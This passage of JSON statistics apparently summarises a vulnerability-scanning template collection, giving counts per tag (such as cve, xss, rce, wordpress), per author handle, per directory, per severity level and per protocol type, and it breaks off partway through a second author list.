wiki","count":1},{"name":"cloudinary","count":1},{"name":"tenda","count":1},{"name":"thinkadmin","count":1},{"name":"webui","count":1},{"name":"jsf","count":1},{"name":"gridx","count":1},{"name":"zend","count":1},{"name":"akamai","count":1},{"name":"gitlist","count":1},{"name":"nuuo","count":1},{"name":"doh","count":1},{"name":"74cms","count":1},{"name":"proftpd","count":1},{"name":"starttls","count":1},{"name":"ganglia","count":1},{"name":"tensorflow","count":1},{"name":"jitsi","count":1},{"name":"plone","count":1},{"name":"bash","count":1},{"name":"zenario","count":1},{"name":"monitorix","count":1},{"name":"ecom","count":1},{"name":"yii","count":1},{"name":"webmin","count":1},{"name":"webadmin","count":1},{"name":"ueditor","count":1},{"name":"lancom","count":1},{"name":"lanproxy","count":1},{"name":"concrete","count":1},{"name":"ilo4","count":1},{"name":"goahead","count":1},{"name":"opensns","count":1},{"name":"grav","count":1},{"name":"bolt","count":1},{"name":"netsweeper","count":1},{"name":"totaljs","count":1},{"name":"feifeicms","count":1},{"name":"flink","count":1},{"name":"finereport","count":1},{"name":"rujjie","count":1},{"name":"webmodule-ee","count":1},{"name":"fortilogger","count":1},{"name":"spring","count":1},{"name":"lansweeper","count":1},{"name":"flash","count":1},{"name":"weiphp","count":1},{"name":"vscode","count":1},{"name":"varnish","count":1},{"name":"npm","count":1},{"name":"emc","count":1},{"name":"drone","count":1},{"name":"alertmanager","count":1},{"name":"gateone","count":1},{"name":"mara","count":1},{"name":"shopxo","count":1},{"name":"jenkin","count":1},{"name":"subrion","count":1},{"name":"rmi","count":1},{"name":"powercreator","count":1},{"name":"postmessage","count":1},{"name":"liferay","count":1},{"name":"backdoor","count":1},{"name":"panos","count":1},{"name":"zte","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":79},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":35},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":13},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"nadino","count":8},{"name":"hackergautam","count":8},{"name":"aashiq","count":8},{"name":"wdahlenb","count":8},{"name":"iamthefrogy","count":8},{"name":"harshbothra_","count":7},{"name":"oppsec","count":7},{"name":"randomstr1ng","count":7},{"name":"melbadry9","count":7},{"name":"0x240x23elu","count":7},{"name":"techryptic (@tech)","count":7},{"name":"emadshanab","count":7},{"name":"that_juan_","count":7},{"name":"r3dg33k","count":7},{"name":"dr_set","count":7},{"name":"philippedelteil","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":5},{"name":"pentest_swissky","count":5},{"name":"caspergn","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"meme-lord","count":4},{"name":"iamnoooob","count":4},{"name":"impramodsargar","count":3},{"name":"binaryfigments","count":3},{"name":"tess","count":3},{"name":"shine","count":3},{"name":"kophjager007","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"joanbono","count":3},{"name":"fyoorer","count":3},{"name":"z3bd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"f1tz","count":3},{"name":"0w4ys","count":3},{"name":"davidmckennirey","count":2},{"name":"incogbyte","count":2},{"name":"kiblyn11","count":2},{"name":"0xcrypto","count":2},{"name":"emenalf","count":2},{"name":"0xelkomy","count":2},{"name":"zomsop82","count":2},{"name":"0xsapra","count":2},{"name":"joeldeleep","count":2},{"name":"shifacyclewala","count":2},{"name":"gevakun","count":2},{"name":"0xprial","count":2},{"name":"mavericknerd","count":2},{"name":"foulenzer","count":2},{"name":"elsfa7110","count":2},{"name":"ehsahil","count":2},{"name":"moritz nentwig","count":2},{"name":"jarijaas","count":2},{"name":"lu4nx","count":2},{"name":"dheerajmadhukar","count":2},{"name":"manas_harsh","count":2},{"name":"bsysop","count":2},{"name":"unstabl3","count":2},{"name":"ree4pwn","count":2},{"name":"pxmme1337","count":2},{"name":"swissky","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"lotusdll","count":2},{"name":"bp0lr","count":2},{"name":"vavkamil","count":2},{"name":"afaq","count":2},{"name":"x1m_martijn","count":2},{"name":"hetroublemakr","count":2},{"name":"randomrobbie","count":2},{"name":"0xrudra","count":2},{"name":"udit_thakkur","count":2},{"name":"random-robbie","count":2},{"name":"amsda","count":2},{"name":"daviey","count":1},{"name":"_generic_human_","count":1},{"name":"0ut0fb4nd","count":1},{"name":"nkxxkn","count":1},{"name":"j33n1k4","count":1},{"name":"tim_koopmans","count":1},{"name":"naglinagli","count":1},{"name":"koti2","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"notsoevilweasel","count":1},{"name":"pdp","count":1},{"name":"geraldino2","count":1},{"name":"shelld3v","count":1},{"name":"deena","count":1},{"name":"regala_","count":1},{"name":"bjhulst","count":1},{"name":"yashgoti","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"alifathi-h1","count":1},{"name":"dogasantos","count":1},{"name":"pudsec","count":1},{"name":"shreyapohekar","count":1},{"name":"zhenwarx","count":1},{"name":"smaranchand","count":1},{"name":"elmahdi","count":1},{"name":"kabirsuda","count":1},{"name":"luskabol","count":1},{"name":"akshansh","count":1},{"name":"divya_mudgal","count":1},{"name":"alperenkesk","count":1},{"name":"@dwisiswant0","count":1},{"name":"rojanrijal","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"_harleo","count":1},{"name":"yashanand155","count":1},{"name":"ilovebinbash","count":1},{"name":"0xtavian","count":1},{"name":"raesene","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"defr0ggy","count":1},{"name":"ohlinge","count":1},{"name":"juicypotato1","count":1},{"name":"flag007","count":1},{"name":"furkansenan","count":1},{"name":"rtcms","count":1},{"name":"sicksec","count":1},{"name":"andirrahmani1","count":1},{"name":"jeya seelan","count":1},{"name":"kareemse1im","count":1},{"name":"52971","count":1},{"name":"yavolo","count":1},{"name":"johnk3r","count":1},{"name":"schniggie","count":1},{"name":"shifacyclewla","count":1},{"name":"its0x08","count":1},{"name":"mah3sec_","count":1},{"name":"mhdsamx","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"absshax","count":1},{"name":"sickwell","count":1},{"name":"fabaff","count":1},{"name":"nytr0gen","count":1},{"name":"ooooooo_q","count":1},{"name":"alph4byt3","count":1},{"name":"gboddin","count":1},{"name":"_darrenmartyn","count":1},{"name":"manuelbua","count":1},{"name":"exploitation","count":1},{"name":"dudez","count":1},{"name":"iampritam","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"rodnt","count":1},{"name":"sshell","count":1},{"name":"bad5ect0r","count":1},{"name":"johnjhacking","count":1},{"name":"alex","count":1},{"name":"fmunozs","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"sy3omda","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"vsh00t","count":1},{"name":"noamrathaus","count":1},{"name":"berkdusunur","count":1},{"name":"s1r1u5_","count":1},{"name":"knassar702","count":1},{"name":"_c0wb0y_","count":1},{"name":"fopina","count":1},{"name":"wabafet","count":1},{"name":"mohammedsaneem","count":1},{"name":"qlkwej","count":1},{"name":"ldionmarcil","count":1},{"name":"hanlaomo","count":1},{"name":"micha3lb3n","count":1},{"name":"soyelmago","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"willd96","count":1},{"name":"apt-mirror","count":1},{"name":"omarkurt","count":1},{"name":"thezakman","count":1},{"name":"d0rkerdevil","count":1},{"name":"ringo","count":1},{"name":"becivells","count":1},{"name":"tirtha_mandal","count":1},{"name":"streetofhackerr007","count":1},{"name":"ipanda","count":1},{"name":"dawid czarnecki","count":1},{"name":"ajaysenr","count":1},{"name":"cookiehanhoan","count":1},{"name":"th3.d1p4k","count":1},{"name":"blckraven","count":1},{"name":"kurohost","count":1},{"name":"c3l3si4n","count":1},{"name":"mubassirpatel","count":1},{"name":"toufik airane","count":1},{"name":"whynotke","count":1},{"name":"abison_binoy","count":1},{"name":"bing0o","count":1},{"name":"bolli95","count":1},{"name":"undefl0w","count":1},{"name":"remonsec","count":1},{"name":"0h1in9e","count":1},{"name":"taielab","count":1},{"name":"affix","count":1},{"name":"idealphase","count":1},{"name":"zandros0","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"gal nagli","count":1},{"name":"luci","count":1},{"name":"ahmed sherif","count":1},{"name":"thevillagehacker","count":1},{"name":"vzamanillo","count":1},{"name":"0xrod","count":1},{"name":"co0nan","count":1},{"name":"hakluke","count":1},{"name":"patralos","count":1},{"name":"chron0x","count":1},{"name":"r3naissance","count":1},{"name":"w4cky_","count":1},{"name":"akash.c","count":1},{"name":"b4uh0lz","count":1},{"name":"arcc","count":1},{"name":"sullo","count":1}],"directory":[{"name":"cves","count":470},{"name":"vulnerabilities","count":232},{"name":"exposed-panels","count":202},{"name":"exposures","count":150},{"name":"technologies","count":129},{"name":"misconfiguration","count":114},{"name":"takeovers","count":70},{"name":"default-logins","count":44},{"name":"file","count":42},{"name":"workflows","count":33},{"name":"miscellaneous","count":27},{"name":"network","count":25},{"name":"iot","count":18},{"name":"fuzzing","count":10},{"name":"dns","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":453},{"name":"high","count":395},{"name":"medium","count":313},{"name":"critical","count":186},{"name":"low","count":150}],"types":[{"name":"http","count":1408},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} +{"tags":[{"name":"cve","count":464},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":165},{"name":"rce","count":162},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":110},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"cve2021","count":71},{"name":"takeover","count":71},{"name":"token","count":63},{"name":"cve2018","count":62},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"iot","count":33},{"name":"network","count":32},{"name":"oracle","count":29},{"name":"sqli","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"oob","count":25},{"name":"ssrf","count":25},{"name":"disclosure","count":24},{"name":"logs","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"listing","count":15},{"name":"cisco","count":15},{"name":"sap","count":14},{"name":"cve2016","count":14},{"name":"fuzz","count":13},{"name":"debug","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"misconfig","count":13},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"springboot","count":11},{"name":"dns","count":11},{"name":"zoho","count":11},{"name":"auth-bypass","count":11},{"name":"devops","count":10},{"name":"cve2011","count":10},{"name":"magento","count":9},{"name":"cve2012","count":9},{"name":"dlink","count":9},{"name":"jenkins","count":9},{"name":"ftp","count":8},{"name":"gitlab","count":8},{"name":"airflow","count":8},{"name":"cve2013","count":8},{"name":"adobe","count":8},{"name":"cnvd","count":8},{"name":"php","count":8},{"name":"aws","count":8},{"name":"joomla","count":7},{"name":"scada","count":7},{"name":"vmware","count":7},{"name":"cve2014","count":7},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"api","count":6},{"name":"nginx","count":6},{"name":"cms","count":6},{"name":"citrix","count":6},{"name":"google","count":6},{"name":"rails","count":6},{"name":"xxe","count":6},{"name":"login","count":5},{"name":"laravel","count":5},{"name":"confluence","count":5},{"name":"solr","count":5},{"name":"dell","count":5},{"name":"java","count":5},{"name":"circarlife","count":5},{"name":"iis","count":5},{"name":"ssti","count":5},{"name":"lucee","count":5},{"name":"phpmyadmin","count":5},{"name":"ruijie","count":5},{"name":"headless","count":5},{"name":"drupal","count":5},{"name":"jetty","count":5},{"name":"solarwinds","count":4},{"name":"samsung","count":4},{"name":"hongdian","count":4},{"name":"docker","count":4},{"name":"cve2009","count":4},{"name":"artifactory","count":4},{"name":"thinkcmf","count":4},{"name":"traversal","count":4},{"name":"thinkphp","count":4},{"name":"nodejs","count":4},{"name":"router","count":4},{"name":"vpn","count":4},{"name":"asp","count":4},{"name":"django","count":4},{"name":"magmi","count":4},{"name":"webserver","count":4},{"name":"tomcat","count":4},{"name":"elastic","count":4},{"name":"moodle","count":4},{"name":"netgear","count":4},{"name":"jolokia","count":4},{"name":"ibm","count":4},{"name":"fileupload","count":4},{"name":"terramaster","count":3},{"name":"bypass","count":3},{"name":"git","count":3},{"name":"ofbiz","count":3},{"name":"fanruan","count":3},{"name":"printer","count":3},{"name":"lfr","count":3},{"name":"grafana","count":3},{"name":"r-seenet","count":3},{"name":"nacos","count":3},{"name":"fpd","count":3},{"name":"backups","count":3},{"name":"openssh","count":3},{"name":"springcloud","count":3},{"name":"amazon","count":3},{"name":"microstrategy","count":3},{"name":"vbulletin","count":3},{"name":"slack","count":3},{"name":"ebs","count":3},{"name":"dedecms","count":3},{"name":"caucho","count":3},{"name":"kubernetes","count":3},{"name":"mongodb","count":3},{"name":"deserialization","count":3},{"name":"resin","count":3},{"name":"ssh","count":3},{"name":"windows","count":3},{"name":"kafka","count":3},{"name":"log","count":3},{"name":"nosqli","count":3},{"name":"crlf","count":3},{"name":"oa","count":3},{"name":"microsoft","count":2},{"name":"rockmongo","count":2},{"name":"cache","count":2},{"name":"intrusive","count":2},{"name":"globalprotect","count":2},{"name":"jboss","count":2},{"name":"openam","count":2},{"name":"openfire","count":2},{"name":"mail","count":2},{"name":"exposures","count":2},{"name":"pega","count":2},{"name":"fortios","count":2},{"name":"keycloak","count":2},{"name":"proxy","count":2},{"name":"oauth","count":2},{"name":"plesk","count":2},{"name":"xxljob","count":2},{"name":"rockethchat","count":2},{"name":"vrealize","count":2},{"name":"splunk","count":2},{"name":"waf","count":2},{"name":"frp","count":2},{"name":"ucmdb","count":2},{"name":"seeyon","count":2},{"name":"prometheus","count":2},{"name":"webcam","count":2},{"name":"spark","count":2},{"name":"injection","count":2},{"name":"emerge","count":2},{"name":"paloalto","count":2},{"name":"hpe","count":2},{"name":"kentico","count":2},{"name":"rstudio","count":2},{"name":"flir","count":2},{"name":"bigip","count":2},{"name":"natshell","count":2},{"name":"ecology","count":2},{"name":"activemq","count":2},{"name":"hp","count":2},{"name":"nagios","count":2},{"name":"icewarp","count":2},{"name":"maian","count":2},{"name":"coldfusion","count":2},{"name":"smtp","count":2},{"name":"dos","count":2},{"name":"nexus","count":2},{"name":"saltstack","count":2},{"name":"smb","count":2},{"name":"couchdb","count":2},{"name":"odoo","count":2},{"name":"zabbix","count":2},{"name":"httpd","count":2},{"name":"kibana","count":2},{"name":"idrac","count":2},{"name":"leak","count":2},{"name":"telerik","count":2},{"name":"glassfish","count":2},{"name":"strapi","count":2},{"name":"nextjs","count":2},{"name":"sonarqube","count":2},{"name":"sonicwall","count":2},{"name":"voipmonitor","count":2},{"name":"sharepoint","count":2},{"name":"wordfence","count":2},{"name":"zhiyuan","count":2},{"name":"jellyfin","count":2},{"name":"hjtcloud","count":2},{"name":"shellshock","count":2},{"name":"huawei","count":2},{"name":"trixbox","count":2},{"name":"chamilo","count":2},{"name":"bitrix","count":2},{"name":"hashicorp","count":2},{"name":"cve2008","count":2},{"name":"yapi","count":2},{"name":"service","count":2},{"name":"showdoc","count":2},{"name":"mida","count":2},{"name":"email","count":1},{"name":"zimbra","count":1},{"name":"moinmoin","count":1},{"name":"mpsec","count":1},{"name":"upnp","count":1},{"name":"jquery","count":1},{"name":"csod","count":1},{"name":"gateone","count":1},{"name":"etouch","count":1},{"name":"sidekiq","count":1},{"name":"xff","count":1},{"name":"expn","count":1},{"name":"wildfly","count":1},{"name":"openstack","count":1},{"name":"nordex","count":1},{"name":"webmin","count":1},{"name":"trilithic","count":1},{"name":"optiLink","count":1},{"name":"node","count":1},{"name":"robomongo","count":1},{"name":"idemia","count":1},{"name":"spring","count":1},{"name":"pyramid","count":1},{"name":"blackboard","count":1},{"name":"hadoop","count":1},{"name":"pgadmin","count":1},{"name":"favicon","count":1},{"name":"mediumish","count":1},{"name":"payara","count":1},{"name":"interlib","count":1},{"name":"netrc","count":1},{"name":"fedora","count":1},{"name":"floc","count":1},{"name":"maccmsv10","count":1},{"name":"heroku","count":1},{"name":"aspnuke","count":1},{"name":"yachtcontrol","count":1},{"name":"upload","count":1},{"name":"gogs","count":1},{"name":"tpshop","count":1},{"name":"spidercontrol","count":1},{"name":"backdoor","count":1},{"name":"redis","count":1},{"name":"tapestry","count":1},{"name":"jeewms","count":1},{"name":"timeclock","count":1},{"name":"bullwark","count":1},{"name":"ricoh","count":1},{"name":"emby","count":1},{"name":"socomec","count":1},{"name":"realteo","count":1},{"name":"checkpoint","count":1},{"name":"rmc","count":1},{"name":"wuzhicms","count":1},{"name":"ioncube","count":1},{"name":"domxss","count":1},{"name":"timesheet","count":1},{"name":"grails","count":1},{"name":"zend","count":1},{"name":"tongda","count":1},{"name":"hortonworks","count":1},{"name":"panabit","count":1},{"name":"db","count":1},{"name":"doh","count":1},{"name":"csrf","count":1},{"name":"zcms","count":1},{"name":"nps","count":1},{"name":"ilo4","count":1},{"name":"postgres","count":1},{"name":"calendarix","count":1},{"name":"majordomo2","count":1},{"name":"kerbynet","count":1},{"name":"dvr","count":1},{"name":"alertmanager","count":1},{"name":"codeigniter","count":1},{"name":"xml","count":1},{"name":"cobub","count":1},{"name":"starttls","count":1},{"name":"clockwatch","count":1},{"name":"ntopng","count":1},{"name":"traefik","count":1},{"name":"opentsdb","count":1},{"name":"beanshell","count":1},{"name":"cve2010","count":1},{"name":"74cms","count":1},{"name":"tenda","count":1},{"name":"enum","count":1},{"name":"akamai","count":1},{"name":"circontrol","count":1},{"name":"harbor","count":1},{"name":"haproxy","count":1},{"name":"sco","count":1},{"name":"biometrics","count":1},{"name":"ruby","count":1},{"name":"dotnet","count":1},{"name":"ulterius","count":1},{"name":"primetek","count":1},{"name":"pacsone","count":1},{"name":"concrete","count":1},{"name":"faraday","count":1},{"name":"k8","count":1},{"name":"cors","count":1},{"name":"postmessage","count":1},{"name":"woocomernce","count":1},{"name":"dotnetnuke","count":1},{"name":"jnoj","count":1},{"name":"geutebruck","count":1},{"name":"yii","count":1},{"name":"b2evolution","count":1},{"name":"mcafee","count":1},{"name":"seacms","count":1},{"name":"kubeflow","count":1},{"name":"fortigate","count":1},{"name":"jsf","count":1},{"name":"ssltls","count":1},{"name":"bolt","count":1},{"name":"wavemaker","count":1},{"name":"apiman","count":1},{"name":"mailchimp","count":1},{"name":"nedi","count":1},{"name":"plc","count":1},{"name":"sqlite","count":1},{"name":"linkedin","count":1},{"name":"skywalking","count":1},{"name":"razor","count":1},{"name":"cloudflare","count":1},{"name":"emc","count":1},{"name":"ecom","count":1},{"name":"rhymix","count":1},{"name":"drone","count":1},{"name":"dompdf","count":1},{"name":"appweb","count":1},{"name":"nomad","count":1},{"name":"webmodule-ee","count":1},{"name":"esmtp","count":1},{"name":"aura","count":1},{"name":"cse","count":1},{"name":"salesforce","count":1},{"name":"opencast","count":1},{"name":"targa","count":1},{"name":"pulsesecure","count":1},{"name":"jsp","count":1},{"name":"jfrog","count":1},{"name":"jmx","count":1},{"name":"centos","count":1},{"name":"ganglia","count":1},{"name":"wp-theme","count":1},{"name":"monitorr","count":1},{"name":"vsftpd","count":1},{"name":"zmanda","count":1},{"name":"rdp","count":1},{"name":"jenzabar","count":1},{"name":"octobercms","count":1},{"name":"blue-ocean","count":1},{"name":"nuuo","count":1},{"name":"ambari","count":1},{"name":"circontrorl","count":1},{"name":"swagger","count":1},{"name":"cve2005","count":1},{"name":"flash","count":1},{"name":"chinaunicom","count":1},{"name":"node-red-dashboard","count":1},{"name":"jenkin","count":1},{"name":"zenario","count":1},{"name":"extractor","count":1},{"name":"bookstack","count":1},{"name":"tensorflow","count":1},{"name":"fastcgi","count":1},{"name":"dom","count":1},{"name":"monitorix","count":1},{"name":"liferay","count":1},{"name":"netsweeper","count":1},{"name":"acme","count":1},{"name":"status","count":1},{"name":"klog","count":1},{"name":"visionhub","count":1},{"name":"wazuh","count":1},{"name":"firebase","count":1},{"name":"ssl","count":1},{"name":"plugin","count":1},{"name":"javafaces","count":1},{"name":"fiori","count":1},{"name":"springframework","count":1},{"name":"turbocrm","count":1},{"name":"erp-nc","count":1},{"name":"mirai","count":1},{"name":"smartsense","count":1},{"name":"lanproxy","count":1},{"name":"landrayoa","count":1},{"name":"hasura","count":1},{"name":"cgi","count":1},{"name":"opensmtpd","count":1},{"name":"proftpd","count":1},{"name":"st","count":1},{"name":"dvwa","count":1},{"name":"feifeicms","count":1},{"name":"shopware","count":1},{"name":"alerta","count":1},{"name":"eyou","count":1},{"name":"sentry","count":1},{"name":"sarg","count":1},{"name":"mysql","count":1},{"name":"weiphp","count":1},{"name":"kafdrop","count":1},{"name":"phalcon","count":1},{"name":"thinkadmin","count":1},{"name":"adminer","count":1},{"name":"tensorboard","count":1},{"name":"itop","count":1},{"name":"arl","count":1},{"name":"cve2007","count":1},{"name":"zte","count":1},{"name":"ems","count":1},{"name":"webadmin","count":1},{"name":"fuelcms","count":1},{"name":"tileserver","count":1},{"name":"moin","count":1},{"name":"netdata","count":1},{"name":"rfi","count":1},{"name":"totaljs","count":1},{"name":"druid","count":1},{"name":"phpinfo","count":1},{"name":"cocoon","count":1},{"name":"htmli","count":1},{"name":"wamp","count":1},{"name":"stem","count":1},{"name":"mautic","count":1},{"name":"wmt","count":1},{"name":"javamelody","count":1},{"name":"nsasg","count":1},{"name":"pippoint","count":1},{"name":"opensns","count":1},{"name":"openrestry","count":1},{"name":"goahead","count":1},{"name":"soar","count":1},{"name":"ueditor","count":1},{"name":"landray","count":1},{"name":"zarafa","count":1},{"name":"2014","count":1},{"name":"octoprint","count":1},{"name":"lotuscms","count":1},{"name":"gloo","count":1},{"name":"avalanche","count":1},{"name":"xdcms","count":1},{"name":"linksys","count":1},{"name":"clave","count":1},{"name":"nc2","count":1},{"name":"bitly","count":1},{"name":"viewlinc","count":1},{"name":"tika","count":1},{"name":"gitlist","count":1},{"name":"plastic","count":1},{"name":"darkstat","count":1},{"name":"opm","count":1},{"name":"k8s","count":1},{"name":"codemeter","count":1},{"name":"netis","count":1},{"name":"kyan","count":1},{"name":"linkerd","count":1},{"name":"fortilogger","count":1},{"name":"webui","count":1},{"name":"tamronos","count":1},{"name":"spf","count":1},{"name":"cloudinary","count":1},{"name":"zzzcms","count":1},{"name":"shopxo","count":1},{"name":"glances","count":1},{"name":"wiki","count":1},{"name":"webftp","count":1},{"name":"ec2","count":1},{"name":"nexusdb","count":1},{"name":"npm","count":1},{"name":"axis","count":1},{"name":"finereport","count":1},{"name":"parentlink","count":1},{"name":"enumeration","count":1},{"name":"wifisky","count":1},{"name":"szhe","count":1},{"name":"krweb","count":1},{"name":"triconsole","count":1},{"name":"livezilla","count":1},{"name":"selea","count":1},{"name":"svnserve","count":1},{"name":"rabbitmq","count":1},{"name":"rsyncd","count":1},{"name":"synnefo","count":1},{"name":"dlogin","count":1},{"name":"uwsgi","count":1},{"name":"phpunit","count":1},{"name":"empirecms","count":1},{"name":"mongoshake","count":1},{"name":"plone","count":1},{"name":"kong","count":1},{"name":"rubedo","count":1},{"name":"wooyun","count":1},{"name":"flink","count":1},{"name":"comodo","count":1},{"name":"vsphere","count":1},{"name":"panos","count":1},{"name":"azure","count":1},{"name":"wso2","count":1},{"name":"nette","count":1},{"name":"xiuno","count":1},{"name":"anchorcms","count":1},{"name":"svn","count":1},{"name":"zookeeper","count":1},{"name":"redhat","count":1},{"name":"keenetic","count":1},{"name":"saltapi","count":1},{"name":"mdb","count":1},{"name":"acexy","count":1},{"name":"redwood","count":1},{"name":"bash","count":1},{"name":"horde","count":1},{"name":"servicedesk","count":1},{"name":"duomicms","count":1},{"name":"portainer","count":1},{"name":"myucms","count":1},{"name":"setup","count":1},{"name":"gridx","count":1},{"name":"zeroshell","count":1},{"name":"scs","count":1},{"name":"mongo","count":1},{"name":"symfony","count":1},{"name":"varnish","count":1},{"name":"metinfo","count":1},{"name":"embedthis","count":1},{"name":"lansweeper","count":1},{"name":"nuxeo","count":1},{"name":"rmi","count":1},{"name":"grav","count":1},{"name":"xunchi","count":1},{"name":"mara","count":1},{"name":"blind","count":1},{"name":"spectracom","count":1},{"name":"openerp","count":1},{"name":"crm","count":1},{"name":"servicenow","count":1},{"name":"discord","count":1},{"name":"clusterengine","count":1},{"name":"jitsi","count":1},{"name":"exchange","count":1},{"name":"bruteforce","count":1},{"name":"lancom","count":1},{"name":"javascript","count":1},{"name":"vscode","count":1},{"name":"labtech","count":1},{"name":"sitecore","count":1},{"name":"rujjie","count":1},{"name":"sprintful","count":1},{"name":"fortigates","count":1},{"name":"igs","count":1},{"name":"zm","count":1},{"name":"oscommerce","count":1},{"name":"memcached","count":1},{"name":"fortiweb","count":1},{"name":"episerver","count":1},{"name":"huijietong","count":1},{"name":"mobileiron","count":1},{"name":"alibaba","count":1},{"name":"fortinet","count":1},{"name":"diris","count":1},{"name":"mantisbt","count":1},{"name":"viewpoint","count":1},{"name":"geddy","count":1},{"name":"avtech","count":1},{"name":"subrion","count":1},{"name":"fastapi","count":1},{"name":"discourse","count":1},{"name":"powercreator","count":1},{"name":"ns","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":79},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":36},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"techbrunchfr","count":13},{"name":"milo2012","count":13},{"name":"suman_kar","count":12},{"name":"pr3r00t","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"wdahlenb","count":8},{"name":"nadino","count":8},{"name":"hackergautam","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"emadshanab","count":7},{"name":"r3dg33k","count":7},{"name":"0x240x23elu","count":7},{"name":"dr_set","count":7},{"name":"melbadry9","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"that_juan_","count":7},{"name":"philippedelteil","count":6},{"name":"__fazal","count":6},{"name":"yanyun","count":5},{"name":"caspergn","count":5},{"name":"puzzlepeaches","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"nodauf","count":4},{"name":"xelkomy","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"rootxharsh","count":4},{"name":"meme-lord","count":4},{"name":"iamnoooob","count":4},{"name":"z3bd","count":3},{"name":"f1tz","count":3},{"name":"kophjager007","count":3},{"name":"0w4ys","count":3},{"name":"joanbono","count":3},{"name":"impramodsargar","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"thomas_from_offensity","count":3},{"name":"shine","count":3},{"name":"fyoorer","count":3},{"name":"jarijaas","count":2},{"name":"0xprial","count":2},{"name":"vavkamil","count":2},{"name":"swissky","count":2},{"name":"incogbyte","count":2},{"name":"foulenzer","count":2},{"name":"unstabl3","count":2},{"name":"manas_harsh","count":2},{"name":"mavericknerd","count":2},{"name":"0xelkomy","count":2},{"name":"shifacyclewala","count":2},{"name":"pxmme1337","count":2},{"name":"joeldeleep","count":2},{"name":"hetroublemakr","count":2},{"name":"lotusdll","count":2},{"name":"0xcrypto","count":2},{"name":"random-robbie","count":2},{"name":"kiblyn11","count":2},{"name":"x1m_martijn","count":2},{"name":"afaq","count":2},{"name":"amsda","count":2},{"name":"0xsapra","count":2},{"name":"0xrudra","count":2},{"name":"emenalf","count":2},{"name":"gevakun","count":2},{"name":"bp0lr","count":2},{"name":"elsfa7110","count":2},{"name":"moritz nentwig","count":2},{"name":"zomsop82","count":2},{"name":"lu4nx","count":2},{"name":"udit_thakkur","count":2},{"name":"bsysop","count":2},{"name":"davidmckennirey","count":2},{"name":"dheerajmadhukar","count":2},{"name":"ehsahil","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"ree4pwn","count":2},{"name":"randomrobbie","count":2},{"name":"streetofhackerr007","count":1},{"name":"yashgoti","count":1},{"name":"patralos","count":1},{"name":"dawid 